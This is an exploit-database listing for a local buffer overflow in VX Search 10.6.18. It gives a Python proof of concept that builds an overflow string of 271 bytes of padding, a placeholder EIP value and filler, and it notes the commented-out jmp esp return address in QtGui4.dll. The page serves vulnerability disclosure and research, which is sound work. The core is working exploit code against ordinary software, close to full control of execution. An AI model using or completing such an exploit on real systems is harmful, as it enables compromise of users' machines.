VX Search 10.6.18 directory Local Buffer Overflow

2018.04.19
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # Title: VX Search 10.6.18 Local Buffer Overflow # Author: Kevin McGuigan # Twitter: @_h3xagram # Author Website: https://www.7elements.co.uk # Vendor Website: http://www.vxsearch.com # Version: 10.6.18 # Date: 18/04/2018 # Tested on: Windows 7 32-bit # Vendor did not respond to advisory. # Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field. filename="vxsearchPOC.txt" junk = "A"*271 #0x652c2a1a : "jmp esp" | asciiprint,ascii {PAGE_READONLY}[QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS:False, v4.3.4.0 (C:\Program Files\VX SearchServer\bin\QtGui4.dll) #eip="\x1a\x2a\x2c\x65" eip = "B" * 4 fill = "C" *900 buffer = junk + eip + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top